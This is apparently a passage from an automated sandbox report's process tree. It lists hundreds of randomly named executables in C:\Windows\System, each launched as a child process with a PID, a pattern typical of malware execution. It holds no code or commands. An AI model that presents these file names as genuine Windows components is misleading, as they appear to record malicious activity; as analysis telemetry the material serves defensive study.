  PID:7188
- C:\Windows\System\UobUyMT.exe
  C:\Windows\System\UobUyMT.exe
  2⤵
  PID:7308
- C:\Windows\System\lKTOMWm.exe
  C:\Windows\System\lKTOMWm.exe
  2⤵
  PID:7340
- C:\Windows\System\HKwwLBK.exe
  C:\Windows\System\HKwwLBK.exe
  2⤵
  PID:7364
- C:\Windows\System\PgvGbwl.exe
  C:\Windows\System\PgvGbwl.exe
  2⤵
  PID:7424
- C:\Windows\System\wjCXayk.exe
  C:\Windows\System\wjCXayk.exe
  2⤵
  PID:7480
- C:\Windows\System\RoMOsxV.exe
  C:\Windows\System\RoMOsxV.exe
  2⤵
  PID:7552
- C:\Windows\System\jdFhlZA.exe
  C:\Windows\System\jdFhlZA.exe
  2⤵
  PID:7608
- C:\Windows\System\vIcMcMf.exe
  C:\Windows\System\vIcMcMf.exe
  2⤵
  PID:7680
- C:\Windows\System\nhZZzCv.exe
  C:\Windows\System\nhZZzCv.exe
  2⤵
  PID:7740
- C:\Windows\System\wfMjQHM.exe
  C:\Windows\System\wfMjQHM.exe
  2⤵
  PID:7804
- C:\Windows\System\PVTHybl.exe
  C:\Windows\System\PVTHybl.exe
  2⤵
  PID:7848
- C:\Windows\System\NEZxZrP.exe
  C:\Windows\System\NEZxZrP.exe
  2⤵
  PID:7916
- C:\Windows\System\ebImTKH.exe
  C:\Windows\System\ebImTKH.exe
  2⤵
  PID:8032
- C:\Windows\System\pBlinkk.exe
  C:\Windows\System\pBlinkk.exe
  2⤵
  PID:8124
- C:\Windows\System\bAxwvyT.exe
  C:\Windows\System\bAxwvyT.exe
  2⤵
  PID:8156
- C:\Windows\System\aJgQRpS.exe
  C:\Windows\System\aJgQRpS.exe
  2⤵
  PID:7268
- C:\Windows\System\YdRXDLI.exe
  C:\Windows\System\YdRXDLI.exe
  2⤵
  PID:7368
- C:\Windows\System\NBmiXMm.exe
  C:\Windows\System\NBmiXMm.exe
  2⤵
  PID:7504
- C:\Windows\System\FgXuPLD.exe
  C:\Windows\System\FgXuPLD.exe
  2⤵
  PID:7724
- C:\Windows\System\KzcvcXh.exe
  C:\Windows\System\KzcvcXh.exe
  2⤵
  PID:7992
- C:\Windows\System\oWMDUCX.exe
  C:\Windows\System\oWMDUCX.exe
  2⤵
  PID:7960
- C:\Windows\System\zfhmddW.exe
  C:\Windows\System\zfhmddW.exe
  2⤵
  PID:8080
- C:\Windows\System\rRibMlI.exe
  C:\Windows\System\rRibMlI.exe
  2⤵
  PID:7276
- C:\Windows\System\KsjsIsU.exe
  C:\Windows\System\KsjsIsU.exe
  2⤵
  PID:7764
- C:\Windows\System\faYvgeR.exe
  C:\Windows\System\faYvgeR.exe
  2⤵
  PID:8172
- C:\Windows\System\ZhVhGxp.exe
  C:\Windows\System\ZhVhGxp.exe
  2⤵
  PID:7824
- C:\Windows\System\lqhGexp.exe
  C:\Windows\System\lqhGexp.exe
  2⤵
  PID:8216
- C:\Windows\System\ZjMTIfp.exe
  C:\Windows\System\ZjMTIfp.exe
  2⤵
  PID:8252
- C:\Windows\System\wtWQscC.exe
  C:\Windows\System\wtWQscC.exe
  2⤵
  PID:8272
- C:\Windows\System\wXPAXLT.exe
  C:\Windows\System\wXPAXLT.exe
  2⤵
  PID:8296
- C:\Windows\System\vnRVldC.exe
  C:\Windows\System\vnRVldC.exe
  2⤵
  PID:8316
- C:\Windows\System\oFAtcWi.exe
  C:\Windows\System\oFAtcWi.exe
  2⤵
  PID:8332
- C:\Windows\System\CvgtQyf.exe
  C:\Windows\System\CvgtQyf.exe
  2⤵
  PID:8364
- C:\Windows\System\YIUbsnu.exe
  C:\Windows\System\YIUbsnu.exe
  2⤵
  PID:8384
- C:\Windows\System\FzWXWni.exe
  C:\Windows\System\FzWXWni.exe
  2⤵
  PID:8408
- C:\Windows\System\vdpXmTd.exe
  C:\Windows\System\vdpXmTd.exe
  2⤵
  PID:8428
- C:\Windows\System\KZTlACC.exe
  C:\Windows\System\KZTlACC.exe
  2⤵
  PID:8472
- C:\Windows\System\GPnoGZb.exe
  C:\Windows\System\GPnoGZb.exe
  2⤵
  PID:8524
- C:\Windows\System\SMcEGKf.exe
  C:\Windows\System\SMcEGKf.exe
  2⤵
  PID:8540
- C:\Windows\System\SybOcGS.exe
  C:\Windows\System\SybOcGS.exe
  2⤵
  PID:8592
- C:\Windows\System\fWMbuxS.exe
  C:\Windows\System\fWMbuxS.exe
  2⤵
  PID:8620
- C:\Windows\System\gHpcWaq.exe
  C:\Windows\System\gHpcWaq.exe
  2⤵
  PID:8644
- C:\Windows\System\mMDHapf.exe
  C:\Windows\System\mMDHapf.exe
  2⤵
  PID:8660
- C:\Windows\System\BooiWea.exe
  C:\Windows\System\BooiWea.exe
  2⤵
  PID:8708
- C:\Windows\System\mvRKxdb.exe
  C:\Windows\System\mvRKxdb.exe
  2⤵
  PID:8724
- C:\Windows\System\yQojAbm.exe
  C:\Windows\System\yQojAbm.exe
  2⤵
  PID:8760
- C:\Windows\System\YOjwIKD.exe
  C:\Windows\System\YOjwIKD.exe
  2⤵
  PID:8780
- C:\Windows\System\WbfJJla.exe
  C:\Windows\System\WbfJJla.exe
  2⤵
  PID:8804
- C:\Windows\System\YIPnaeW.exe
  C:\Windows\System\YIPnaeW.exe
  2⤵
  PID:8824
- C:\Windows\System\YlYMixX.exe
  C:\Windows\System\YlYMixX.exe
  2⤵
  PID:8860
- C:\Windows\System\ByeWDbI.exe
  C:\Windows\System\ByeWDbI.exe
  2⤵
  PID:8884
- C:\Windows\System\YQRPrXU.exe
  C:\Windows\System\YQRPrXU.exe
  2⤵
  PID:8920
- C:\Windows\System\GIqHlYi.exe
  C:\Windows\System\GIqHlYi.exe
  2⤵
  PID:8944
- C:\Windows\System\onvUhPH.exe
  C:\Windows\System\onvUhPH.exe
  2⤵
  PID:8964
- C:\Windows\System\eBnkAgx.exe
  C:\Windows\System\eBnkAgx.exe
  2⤵
  PID:9012
- C:\Windows\System\cYbofdu.exe
  C:\Windows\System\cYbofdu.exe
  2⤵
  PID:9036
- C:\Windows\System\QcQPwre.exe
  C:\Windows\System\QcQPwre.exe
  2⤵
  PID:9060
- C:\Windows\System\NEbUzJw.exe
  C:\Windows\System\NEbUzJw.exe
  2⤵
  PID:9116
- C:\Windows\System\GyJHZWj.exe
  C:\Windows\System\GyJHZWj.exe
  2⤵
  PID:9136
- C:\Windows\System\qMgfTdm.exe
  C:\Windows\System\qMgfTdm.exe
  2⤵
  PID:9160
- C:\Windows\System\efZZFLg.exe
  C:\Windows\System\efZZFLg.exe
  2⤵
  PID:9180
- C:\Windows\System\zRHOUDF.exe
  C:\Windows\System\zRHOUDF.exe
  2⤵
  PID:7872
- C:\Windows\System\Oppuiqc.exe
  C:\Windows\System\Oppuiqc.exe
  2⤵
  PID:8228
- C:\Windows\System\HDCvess.exe
  C:\Windows\System\HDCvess.exe
  2⤵
  PID:8268
- C:\Windows\System\EZixHxe.exe
  C:\Windows\System\EZixHxe.exe
  2⤵
  PID:8328
- C:\Windows\System\nuOYdGQ.exe
  C:\Windows\System\nuOYdGQ.exe
  2⤵
  PID:8356
- C:\Windows\System\YnHFfqd.exe
  C:\Windows\System\YnHFfqd.exe
  2⤵
  PID:8372
- C:\Windows\System\RTGWgyI.exe
  C:\Windows\System\RTGWgyI.exe
  2⤵
  PID:8532
- C:\Windows\System\PuxKTIh.exe
  C:\Windows\System\PuxKTIh.exe
  2⤵
  PID:8600
- C:\Windows\System\iJinXAa.exe
  C:\Windows\System\iJinXAa.exe
  2⤵
  PID:8680
- C:\Windows\System\DeEFucz.exe
  C:\Windows\System\DeEFucz.exe
  2⤵
  PID:8720
- C:\Windows\System\VxeRFDL.exe
  C:\Windows\System\VxeRFDL.exe
  2⤵
  PID:8772
- C:\Windows\System\WZLuyPW.exe
  C:\Windows\System\WZLuyPW.exe
  2⤵
  PID:8816
- C:\Windows\System\KILYwep.exe
  C:\Windows\System\KILYwep.exe
  2⤵
  PID:8940
- C:\Windows\System\VjTfRyq.exe
  C:\Windows\System\VjTfRyq.exe
  2⤵
  PID:9104
- C:\Windows\System\kYsplaS.exe
  C:\Windows\System\kYsplaS.exe
  2⤵
  PID:9144
- C:\Windows\System\tElAVPW.exe
  C:\Windows\System\tElAVPW.exe
  2⤵
  PID:9176
- C:\Windows\System\VdrUbLw.exe
  C:\Windows\System\VdrUbLw.exe
  2⤵
  PID:9204
- C:\Windows\System\uoqTZJs.exe
  C:\Windows\System\uoqTZJs.exe
  2⤵
  PID:8264
- C:\Windows\System\yXIQemA.exe
  C:\Windows\System\yXIQemA.exe
  2⤵
  PID:8404
- C:\Windows\System\PAdwQUZ.exe
  C:\Windows\System\PAdwQUZ.exe
  2⤵
  PID:8464
- C:\Windows\System\VbpgYJB.exe
  C:\Windows\System\VbpgYJB.exe
  2⤵
  PID:8496
- C:\Windows\System\FJhzyDa.exe
  C:\Windows\System\FJhzyDa.exe
  2⤵
  PID:8604
- C:\Windows\System\mxzXYiV.exe
  C:\Windows\System\mxzXYiV.exe
  2⤵
  PID:8700
- C:\Windows\System\FqCQoYT.exe
  C:\Windows\System\FqCQoYT.exe
  2⤵
  PID:9252
- C:\Windows\System\SAGqaWW.exe
  C:\Windows\System\SAGqaWW.exe
  2⤵
  PID:9272
- C:\Windows\System\PCeOZOt.exe
  C:\Windows\System\PCeOZOt.exe
  2⤵
  PID:9292
- C:\Windows\System\oIjvHwv.exe
  C:\Windows\System\oIjvHwv.exe
  2⤵
  PID:9364
- C:\Windows\System\YiLhCZh.exe
  C:\Windows\System\YiLhCZh.exe
  2⤵
  PID:9472
- C:\Windows\System\aHjzlgL.exe
  C:\Windows\System\aHjzlgL.exe
  2⤵
  PID:9492
- C:\Windows\System\DNWLiQY.exe
  C:\Windows\System\DNWLiQY.exe
  2⤵
  PID:9548
- C:\Windows\System\QmDkgpq.exe
  C:\Windows\System\QmDkgpq.exe
  2⤵
  PID:9572
- C:\Windows\System\UWJigYw.exe
  C:\Windows\System\UWJigYw.exe
  2⤵
  PID:9592
- C:\Windows\System\RFzAAvW.exe
  C:\Windows\System\RFzAAvW.exe
  2⤵
  PID:9620
- C:\Windows\System\LIwcpjl.exe
  C:\Windows\System\LIwcpjl.exe
  2⤵
  PID:9652
- C:\Windows\System\xyblfsP.exe
  C:\Windows\System\xyblfsP.exe
  2⤵
  PID:9684
- C:\Windows\System\vUSuvEE.exe
  C:\Windows\System\vUSuvEE.exe
  2⤵
  PID:9720
- C:\Windows\System\CjyxLDE.exe
  C:\Windows\System\CjyxLDE.exe
  2⤵
  PID:9756
- C:\Windows\System\xjmXOjo.exe
  C:\Windows\System\xjmXOjo.exe
  2⤵
  PID:9808
- C:\Windows\System\osqHMhQ.exe
  C:\Windows\System\osqHMhQ.exe
  2⤵
  PID:9824
- C:\Windows\System\gdPiQqR.exe
  C:\Windows\System\gdPiQqR.exe
  2⤵
  PID:9848
- C:\Windows\System\sIZivNA.exe
  C:\Windows\System\sIZivNA.exe
  2⤵
  PID:9880
- C:\Windows\System\gukAxuf.exe
  C:\Windows\System\gukAxuf.exe
  2⤵
  PID:9920
- C:\Windows\System\QhXaSwV.exe
  C:\Windows\System\QhXaSwV.exe
  2⤵
  PID:9940
- C:\Windows\System\hAoPhVA.exe
  C:\Windows\System\hAoPhVA.exe
  2⤵
  PID:9968
- C:\Windows\System\Qdluhjt.exe
  C:\Windows\System\Qdluhjt.exe
  2⤵
  PID:10000
- C:\Windows\System\qafzDhl.exe
  C:\Windows\System\qafzDhl.exe
  2⤵
  PID:10028
- C:\Windows\System\KZbkhTf.exe
  C:\Windows\System\KZbkhTf.exe
  2⤵
  PID:10048
- C:\Windows\System\VKRrEaV.exe
  C:\Windows\System\VKRrEaV.exe
  2⤵
  PID:10088
- C:\Windows\System\JWQgYRV.exe
  C:\Windows\System\JWQgYRV.exe
  2⤵
  PID:10104
- C:\Windows\System\nuCKjuL.exe
  C:\Windows\System\nuCKjuL.exe
  2⤵
  PID:10128
- C:\Windows\System\ONSaQjp.exe
  C:\Windows\System\ONSaQjp.exe
  2⤵
  PID:10152
- C:\Windows\System\lDbGygc.exe
  C:\Windows\System\lDbGygc.exe
  2⤵
  PID:10188
- C:\Windows\System\lCetAdK.exe
  C:\Windows\System\lCetAdK.exe
  2⤵
  PID:10204
- C:\Windows\System\ABmmKGe.exe
  C:\Windows\System\ABmmKGe.exe
  2⤵
  PID:9156
- C:\Windows\System\wKPyFfU.exe
  C:\Windows\System\wKPyFfU.exe
  2⤵
  PID:9172
- C:\Windows\System\SNtlUQs.exe
  C:\Windows\System\SNtlUQs.exe
  2⤵
  PID:9212
- C:\Windows\System\EHARUhw.exe
  C:\Windows\System\EHARUhw.exe
  2⤵
  PID:8292
- C:\Windows\System\kfwNZWA.exe
  C:\Windows\System\kfwNZWA.exe
  2⤵
  PID:8616
- C:\Windows\System\umZGxAn.exe
  C:\Windows\System\umZGxAn.exe
  2⤵
  PID:9108
- C:\Windows\System\VfsLGpI.exe
  C:\Windows\System\VfsLGpI.exe
  2⤵
  PID:9084
- C:\Windows\System\YYNghiA.exe
  C:\Windows\System\YYNghiA.exe
  2⤵
  PID:1672
- C:\Windows\System\tpqxjua.exe
  C:\Windows\System\tpqxjua.exe
  2⤵
  PID:8796
- C:\Windows\System\jIhJvUl.exe
  C:\Windows\System\jIhJvUl.exe
  2⤵
  PID:9240
- C:\Windows\System\qjTjLLG.exe
  C:\Windows\System\qjTjLLG.exe
  2⤵
  PID:9300
- C:\Windows\System\LpZQdaf.exe
  C:\Windows\System\LpZQdaf.exe
  2⤵
  PID:9440
- C:\Windows\System\eZXpKJT.exe
  C:\Windows\System\eZXpKJT.exe
  2⤵
  PID:9568
- C:\Windows\System\xUkPoPj.exe
  C:\Windows\System\xUkPoPj.exe
  2⤵
  PID:9564
- C:\Windows\System\SCcOloL.exe
  C:\Windows\System\SCcOloL.exe
  2⤵
  PID:9748
- C:\Windows\System\JwTqNRx.exe
  C:\Windows\System\JwTqNRx.exe
  2⤵
  PID:9752
- C:\Windows\System\YpVDHdO.exe
  C:\Windows\System\YpVDHdO.exe
  2⤵
  PID:9840
- C:\Windows\System\ehWavoT.exe
  C:\Windows\System\ehWavoT.exe
  2⤵
  PID:9912
- C:\Windows\System\bjxkGya.exe
  C:\Windows\System\bjxkGya.exe
  2⤵
  PID:9952
- C:\Windows\System\FqUxzZU.exe
  C:\Windows\System\FqUxzZU.exe
  2⤵
  PID:10016
- C:\Windows\System\jBhjRSl.exe
  C:\Windows\System\jBhjRSl.exe
  2⤵
  PID:10120
- C:\Windows\System\quEYnMo.exe
  C:\Windows\System\quEYnMo.exe
  2⤵
  PID:10196
- C:\Windows\System\rJlBtOT.exe
  C:\Windows\System\rJlBtOT.exe
  2⤵
  PID:10220
- C:\Windows\System\tQzjXlH.exe
  C:\Windows\System\tQzjXlH.exe
  2⤵
  PID:8352
- C:\Windows\System\hpDzlnk.exe
  C:\Windows\System\hpDzlnk.exe
  2⤵
  PID:8512
- C:\Windows\System\rJcVgeV.exe
  C:\Windows\System\rJcVgeV.exe
  2⤵
  PID:7892
- C:\Windows\System\AaogewB.exe
  C:\Windows\System\AaogewB.exe
  2⤵
  PID:8880
- C:\Windows\System\wRQLsIa.exe
  C:\Windows\System\wRQLsIa.exe
  2⤵
  PID:9288
- C:\Windows\System\VbgFRUM.exe
  C:\Windows\System\VbgFRUM.exe
  2⤵
  PID:9584
- C:\Windows\System\TFjJoFw.exe
  C:\Windows\System\TFjJoFw.exe
  2⤵
  PID:9676
- C:\Windows\System\NKInSyX.exe
  C:\Windows\System\NKInSyX.exe
  2⤵
  PID:9896
- C:\Windows\System\vLqkHOr.exe
  C:\Windows\System\vLqkHOr.exe
  2⤵
  PID:10200
- C:\Windows\System\zfnCCcf.exe
  C:\Windows\System\zfnCCcf.exe
  2⤵
  PID:8852
- C:\Windows\System\nFcRqJR.exe
  C:\Windows\System\nFcRqJR.exe
  2⤵
  PID:9236
- C:\Windows\System\QcvQSSE.exe
  C:\Windows\System\QcvQSSE.exe
  2⤵
  PID:8732
- C:\Windows\System\fMPDbgw.exe
  C:\Windows\System\fMPDbgw.exe
  2⤵
  PID:9664
- C:\Windows\System\zVpINSV.exe
  C:\Windows\System\zVpINSV.exe
  2⤵
  PID:9388
- C:\Windows\System\WXisWRT.exe
  C:\Windows\System\WXisWRT.exe
  2⤵
  PID:9616
- C:\Windows\System\AGhQsbn.exe
  C:\Windows\System\AGhQsbn.exe
  2⤵
  PID:10260
- C:\Windows\System\jkGJDDw.exe
  C:\Windows\System\jkGJDDw.exe
  2⤵
  PID:10276
- C:\Windows\System\sATltEM.exe
  C:\Windows\System\sATltEM.exe
  2⤵
  PID:10320
- C:\Windows\System\jHBHYGf.exe
  C:\Windows\System\jHBHYGf.exe
  2⤵
  PID:10340
- C:\Windows\System\ghSUeAC.exe
  C:\Windows\System\ghSUeAC.exe
  2⤵
  PID:10360
- C:\Windows\System\YfPJqFm.exe
  C:\Windows\System\YfPJqFm.exe
  2⤵
  PID:10380
- C:\Windows\System\LgNjHGM.exe
  C:\Windows\System\LgNjHGM.exe
  2⤵
  PID:10420
- C:\Windows\System\MfRtPZK.exe
  C:\Windows\System\MfRtPZK.exe
  2⤵
  PID:10436
- C:\Windows\System\TmQEzhi.exe
  C:\Windows\System\TmQEzhi.exe
  2⤵
  PID:10468
- C:\Windows\System\wAlnELR.exe
  C:\Windows\System\wAlnELR.exe
  2⤵
  PID:10488
- C:\Windows\System\QGqTvJX.exe
  C:\Windows\System\QGqTvJX.exe
  2⤵
  PID:10532
- C:\Windows\System\PxpSwAj.exe
  C:\Windows\System\PxpSwAj.exe
  2⤵
  PID:10556
- C:\Windows\System\urkVnur.exe
  C:\Windows\System\urkVnur.exe
  2⤵
  PID:10580
- C:\Windows\System\ZhDslHP.exe
  C:\Windows\System\ZhDslHP.exe
  2⤵
  PID:10604
- C:\Windows\System\SnSoEbk.exe
  C:\Windows\System\SnSoEbk.exe
  2⤵
  PID:10636
- C:\Windows\System\ckyDhst.exe
  C:\Windows\System\ckyDhst.exe
  2⤵
  PID:10660
- C:\Windows\System\NagwEDU.exe
  C:\Windows\System\NagwEDU.exe
  2⤵
  PID:10688
- C:\Windows\System\FdJTYMB.exe
  C:\Windows\System\FdJTYMB.exe
  2⤵
  PID:10716
- C:\Windows\System\wwfsJgc.exe
  C:\Windows\System\wwfsJgc.exe
  2⤵
  PID:10748
- C:\Windows\System\zQgNHhc.exe
  C:\Windows\System\zQgNHhc.exe
  2⤵
  PID:10764
- C:\Windows\System\FcyzzvQ.exe
  C:\Windows\System\FcyzzvQ.exe
  2⤵
  PID:10784
- C:\Windows\System\XwXdVJS.exe
  C:\Windows\System\XwXdVJS.exe
  2⤵
  PID:10812
- C:\Windows\System\XArAFlz.exe
  C:\Windows\System\XArAFlz.exe
  2⤵
  PID:10828
- C:\Windows\System\NXWrswZ.exe
  C:\Windows\System\NXWrswZ.exe
  2⤵
  PID:10856
- C:\Windows\System\oRqFybr.exe
  C:\Windows\System\oRqFybr.exe
  2⤵
  PID:10920
- C:\Windows\System\iJWphDw.exe
  C:\Windows\System\iJWphDw.exe
  2⤵
  PID:10940
- C:\Windows\System\KBKXibe.exe
  C:\Windows\System\KBKXibe.exe
  2⤵
  PID:10960
- C:\Windows\System\mZuUByE.exe
  C:\Windows\System\mZuUByE.exe
  2⤵
  PID:10984
- C:\Windows\System\WsGLGcj.exe
  C:\Windows\System\WsGLGcj.exe
  2⤵
  PID:11024
- C:\Windows\System\KPQDEwK.exe
  C:\Windows\System\KPQDEwK.exe
  2⤵
  PID:11052
- C:\Windows\System\nrLooFa.exe
  C:\Windows\System\nrLooFa.exe
  2⤵
  PID:11076
- C:\Windows\System\vvGpJhK.exe
  C:\Windows\System\vvGpJhK.exe
  2⤵
  PID:11100
- C:\Windows\System\FNsYYqU.exe
  C:\Windows\System\FNsYYqU.exe
  2⤵
  PID:11132
- C:\Windows\System\XVmrKnf.exe
  C:\Windows\System\XVmrKnf.exe
  2⤵
  PID:11164
- C:\Windows\System\PRmglsD.exe
  C:\Windows\System\PRmglsD.exe
  2⤵
  PID:11192
- C:\Windows\System\ZjHCiQw.exe
  C:\Windows\System\ZjHCiQw.exe
  2⤵
  PID:11216
- C:\Windows\System\HKXwnLD.exe
  C:\Windows\System\HKXwnLD.exe
  2⤵
  PID:11236
- C:\Windows\System\dBycULO.exe
  C:\Windows\System\dBycULO.exe
  2⤵
  PID:9188
- C:\Windows\System\rYurine.exe
  C:\Windows\System\rYurine.exe
  2⤵
  PID:8392
- C:\Windows\System\mJSUppL.exe
  C:\Windows\System\mJSUppL.exe
  2⤵
  PID:10336
- C:\Windows\System\bgqpvSm.exe
  C:\Windows\System\bgqpvSm.exe
  2⤵
  PID:10388
- C:\Windows\System\TPhLTab.exe
  C:\Windows\System\TPhLTab.exe
  2⤵
  PID:10464
- C:\Windows\System\WGLnEHE.exe
  C:\Windows\System\WGLnEHE.exe
  2⤵
  PID:10508
- C:\Windows\System\VRfEhPC.exe
  C:\Windows\System\VRfEhPC.exe
  2⤵
  PID:10552
- C:\Windows\System\YJMGYEy.exe
  C:\Windows\System\YJMGYEy.exe
  2⤵
  PID:10628
- C:\Windows\System\noOUrob.exe
  C:\Windows\System\noOUrob.exe
  2⤵
  PID:10724
- C:\Windows\System\QHbJvhP.exe
  C:\Windows\System\QHbJvhP.exe
  2⤵
  PID:10776
- C:\Windows\System\VsNsScQ.exe
  C:\Windows\System\VsNsScQ.exe
  2⤵
  PID:10912
- C:\Windows\System\jdXAYkG.exe
  C:\Windows\System\jdXAYkG.exe
  2⤵
  PID:1428
- C:\Windows\System\ZlcGwAI.exe
  C:\Windows\System\ZlcGwAI.exe
  2⤵
  PID:10968
- C:\Windows\System\tkOylXV.exe
  C:\Windows\System\tkOylXV.exe
  2⤵
  PID:11064
- C:\Windows\System\DJFspRM.exe
  C:\Windows\System\DJFspRM.exe
  2⤵
  PID:11144
- C:\Windows\System\kPkAuqn.exe
  C:\Windows\System\kPkAuqn.exe
  2⤵
  PID:11176
- C:\Windows\System\NVBXNTu.exe
  C:\Windows\System\NVBXNTu.exe
  2⤵
  PID:10452
- C:\Windows\System\NUoqoIv.exe
  C:\Windows\System\NUoqoIv.exe
  2⤵
  PID:10348
- C:\Windows\System\EXSASrZ.exe
  C:\Windows\System\EXSASrZ.exe
  2⤵
  PID:10416
- C:\Windows\System\aRXvZrP.exe
  C:\Windows\System\aRXvZrP.exe
  2⤵
  PID:10668
- C:\Windows\System\MhlMlPR.exe
  C:\Windows\System\MhlMlPR.exe
  2⤵
  PID:10928
- C:\Windows\System\MAlxOUm.exe
  C:\Windows\System\MAlxOUm.exe
  2⤵
  PID:10936
- C:\Windows\System\NYyCMxB.exe
  C:\Windows\System\NYyCMxB.exe
  2⤵
  PID:11044
- C:\Windows\System\OokXPgc.exe
  C:\Windows\System\OokXPgc.exe
  2⤵
  PID:11140
- C:\Windows\System\qAnFatr.exe
  C:\Windows\System\qAnFatr.exe
  2⤵
  PID:10256
- C:\Windows\System\UugBEfd.exe
  C:\Windows\System\UugBEfd.exe
  2⤵
  PID:10332
- C:\Windows\System\ymBGONl.exe
  C:\Windows\System\ymBGONl.exe
  2⤵
  PID:10956
- C:\Windows\System\TjGMXbu.exe
  C:\Windows\System\TjGMXbu.exe
  2⤵
  PID:10316
- C:\Windows\System\AXbNTWh.exe
  C:\Windows\System\AXbNTWh.exe
  2⤵
  PID:11068
- C:\Windows\System\XjPwiDF.exe
  C:\Windows\System\XjPwiDF.exe
  2⤵
  PID:11288
- C:\Windows\System\rbYxiso.exe
  C:\Windows\System\rbYxiso.exe
  2⤵
  PID:11332
- C:\Windows\System\NepAwUT.exe
  C:\Windows\System\NepAwUT.exe
  2⤵
  PID:11356
- C:\Windows\System\aFeotds.exe
  C:\Windows\System\aFeotds.exe
  2⤵
  PID:11376
- C:\Windows\System\AtTxXcD.exe
  C:\Windows\System\AtTxXcD.exe
  2⤵
  PID:11404
- C:\Windows\System\WYfPvwf.exe
  C:\Windows\System\WYfPvwf.exe
  2⤵
  PID:11432
- C:\Windows\System\BcakUXV.exe
  C:\Windows\System\BcakUXV.exe
  2⤵
  PID:11456
- C:\Windows\System\nHWLAHS.exe
  C:\Windows\System\nHWLAHS.exe
  2⤵
  PID:11476
- C:\Windows\System\maOVcCU.exe
  C:\Windows\System\maOVcCU.exe
  2⤵
  PID:11504
- C:\Windows\System\ZchYnSh.exe
  C:\Windows\System\ZchYnSh.exe
  2⤵
  PID:11552
- C:\Windows\System\VGckBPV.exe
  C:\Windows\System\VGckBPV.exe
  2⤵
  PID:11572
- C:\Windows\System\YOEUkMI.exe
  C:\Windows\System\YOEUkMI.exe
  2⤵
  PID:11600
- C:\Windows\System\yNVwJMb.exe
  C:\Windows\System\yNVwJMb.exe
  2⤵
  PID:11620
- C:\Windows\System\PgpFEzH.exe
  C:\Windows\System\PgpFEzH.exe
  2⤵
  PID:11640
- C:\Windows\System\FtjKRYN.exe
  C:\Windows\System\FtjKRYN.exe
  2⤵
  PID:11684
- C:\Windows\System\bjYrRwn.exe
  C:\Windows\System\bjYrRwn.exe
  2⤵
  PID:11700
- C:\Windows\System\pvqzwEV.exe
  C:\Windows\System\pvqzwEV.exe
  2⤵
  PID:11728
- C:\Windows\System\mBjpAOF.exe
  C:\Windows\System\mBjpAOF.exe
  2⤵
  PID:11756
- C:\Windows\System\FIpKAQG.exe
  C:\Windows\System\FIpKAQG.exe
  2⤵
  PID:11788
- C:\Windows\System\oOaMnrF.exe
  C:\Windows\System\oOaMnrF.exe
  2⤵
  PID:11848
- C:\Windows\System\fUSJRNO.exe
  C:\Windows\System\fUSJRNO.exe
  2⤵
  PID:11868
- C:\Windows\System\LNQPQOP.exe
  C:\Windows\System\LNQPQOP.exe
  2⤵
  PID:11896
- C:\Windows\System\aIsGnNI.exe
  C:\Windows\System\aIsGnNI.exe
  2⤵
  PID:11952
- C:\Windows\System\wPzJoMq.exe
  C:\Windows\System\wPzJoMq.exe
  2⤵
  PID:11972
- C:\Windows\System\ONRJmaQ.exe
  C:\Windows\System\ONRJmaQ.exe
  2⤵
  PID:11992
- C:\Windows\System\YiXBohz.exe
  C:\Windows\System\YiXBohz.exe
  2⤵
  PID:12028
- C:\Windows\System\HxVUqAc.exe
  C:\Windows\System\HxVUqAc.exe
  2⤵
  PID:12060
- C:\Windows\System\jIcKkWC.exe
  C:\Windows\System\jIcKkWC.exe
  2⤵
  PID:12092
- C:\Windows\System\jFkXiUA.exe
  C:\Windows\System\jFkXiUA.exe
  2⤵
  PID:12120
- C:\Windows\System\qRzmhMj.exe
  C:\Windows\System\qRzmhMj.exe
  2⤵
  PID:12140
- C:\Windows\System\fTjyLRu.exe
  C:\Windows\System\fTjyLRu.exe
  2⤵
  PID:12168
- C:\Windows\System\vxTBOMB.exe
  C:\Windows\System\vxTBOMB.exe
  2⤵
  PID:12192
- C:\Windows\System\PcuwAwu.exe
  C:\Windows\System\PcuwAwu.exe
  2⤵
  PID:12212
- C:\Windows\System\znfqTPT.exe
  C:\Windows\System\znfqTPT.exe
  2⤵
  PID:12252
- C:\Windows\System\QiAMNAV.exe
  C:\Windows\System\QiAMNAV.exe
  2⤵
  PID:12276
- C:\Windows\System\qaPdaCD.exe
  C:\Windows\System\qaPdaCD.exe
  2⤵
  PID:10876
- C:\Windows\System\IMjBAyY.exe
  C:\Windows\System\IMjBAyY.exe
  2⤵
  PID:11320
- C:\Windows\System\FDAiYpA.exe
  C:\Windows\System\FDAiYpA.exe
  2⤵
  PID:11372
- C:\Windows\System\vNIliFq.exe
  C:\Windows\System\vNIliFq.exe
  2⤵
  PID:11424
- C:\Windows\System\TZNPNuE.exe
  C:\Windows\System\TZNPNuE.exe
  2⤵
  PID:11472
- C:\Windows\System\jgQjKKE.exe
  C:\Windows\System\jgQjKKE.exe
  2⤵
  PID:11568
- C:\Windows\System\AvneZhU.exe
  C:\Windows\System\AvneZhU.exe
  2⤵
  PID:11680
- C:\Windows\System\BqYmVym.exe
  C:\Windows\System\BqYmVym.exe
  2⤵
  PID:11692
- C:\Windows\System\wRjUMid.exe
  C:\Windows\System\wRjUMid.exe
  2⤵
  PID:11696
- C:\Windows\System\ambBTst.exe
  C:\Windows\System\ambBTst.exe
  2⤵
  PID:11816
- C:\Windows\System\LJmUdtN.exe
  C:\Windows\System\LJmUdtN.exe
  2⤵
  PID:11904
- C:\Windows\System\uhotdbi.exe
  C:\Windows\System\uhotdbi.exe
  2⤵
  PID:11964
- C:\Windows\System\VoAkEqA.exe
  C:\Windows\System\VoAkEqA.exe
  2⤵
  PID:12020
- C:\Windows\System\PiBtWMD.exe
  C:\Windows\System\PiBtWMD.exe
  2⤵
  PID:12080
- C:\Windows\System\DPwqZhe.exe
  C:\Windows\System\DPwqZhe.exe
  2⤵
  PID:12132
- C:\Windows\System\VuCiEXh.exe
  C:\Windows\System\VuCiEXh.exe
  2⤵
  PID:12260
- C:\Windows\System\AyOILVr.exe
  C:\Windows\System\AyOILVr.exe
  2⤵
  PID:12248
- C:\Windows\System\VfJvSwD.exe
  C:\Windows\System\VfJvSwD.exe
  2⤵
  PID:11412
- C:\Windows\System\npNjgGA.exe
  C:\Windows\System\npNjgGA.exe
  2⤵
  PID:11584
- C:\Windows\System\trCocah.exe
  C:\Windows\System\trCocah.exe
  2⤵
  PID:11632
- C:\Windows\System\HWVTegD.exe
  C:\Windows\System\HWVTegD.exe
  2⤵
  PID:11664
- C:\Windows\System\seKejGy.exe
  C:\Windows\System\seKejGy.exe
  2⤵
  PID:3984
- C:\Windows\System\PxVjgsg.exe
  C:\Windows\System\PxVjgsg.exe
  2⤵
  PID:11944
